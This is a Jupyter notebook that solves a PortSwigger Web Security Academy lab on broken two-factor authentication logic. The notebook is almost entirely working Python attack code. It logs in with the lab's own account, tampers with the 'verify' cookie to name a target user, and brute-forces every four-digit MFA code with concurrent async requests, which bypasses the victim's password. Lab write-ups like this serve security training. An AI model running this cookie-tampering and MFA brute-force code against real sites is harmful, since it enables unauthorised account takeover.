# 2FA Broken Logic
https://portswigger.net/web-security/authentication/multi-factor/lab-2fa-broken-logic

Process:
1. Login with our own account (getting an MFA token)
2. Use the cookie with the target username to send an MFA token to them
3. Brute force their MFA token
4. Now we've logged in without even needing their password!

In [ ]:
import requests
from requests.cookies import cookiejar_from_dict as cfd

### 1. Login

In [ ]:
URL = "https://acc51fe81fed1ca9c0992cb6000200fa.web-security-academy.net/"

my_credentials = {"username" : "wiener", "password" : "peter"}

#Post to the initial login screen (triggering the MFA token to be emailed to us)
s = requests.session()
r = s.post(URL + "login", data=my_credentials)

In [ ]:
s.cookies.get_dict()

### 2. Send Target MFA Code

In [ ]:
#Specify target:
target = "carlos"

#Get and modify cookies
cookies = s.cookies.get_dict()
cookies['verify'] = target

r = s.get(URL + "login2", cookies=cfd(cookies))

### 3. Brute Force MFA Token

In [ ]:
import aiohttp
import asyncio
import async_timeout
import tqdm.notebook as tq

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

In [ ]:
#Makw MFA code data
all_tokens = ["0"*(4-len(str(x))) + str(x) for x in range(10000)]

In [ ]:
import asyncio
from timeit import default_timer
from aiohttp import ClientSession
import requests

def fetch_async(url, target, all_tokens):
    loop = asyncio.get_event_loop() 
    future = asyncio.ensure_future(fetch_all(url, target, all_tokens)) 
    tasks = loop.run_until_complete(future) 
    return tasks
    
async def fetch_all(url, target, all_tokens):
    tasks = []
    async with ClientSession() as session:
        for each_token in all_tokens:
            task = asyncio.ensure_future(fetch(url, target, each_token, session))
            tasks.append(task) 
        _ = await asyncio.gather(*tasks) 
    return tasks

async def fetch(url, target, each_token, session):
    async with session.post(url, data={"mfa-code" : each_token}, cookies=cfd({"verify" : target})) as response:
        r = await response.read()
        return r

result = fetch_async(URL + "login2", target, all_tokens)

Yay this works!

# Attempt 2 - using simpler code

In [ ]:
import aiohttp
import asyncio

#Important for jupyter
import nest_asyncio
nest_asyncio.apply()

async def fetch(client, each_token):
    async with client.post(URL + "login2", data={"mfa-code" : each_token}, cookies=cfd({"verify" : target})) as resp:
        return await resp.text()

async def main():
    async with aiohttp.ClientSession() as client:
        results = []
        for each_token in all_tokens[:1000]:
            results.append(len(await fetch(client, each_token)))
    return results
        
a = asyncio.run(main())

This appears to work, but might be slower...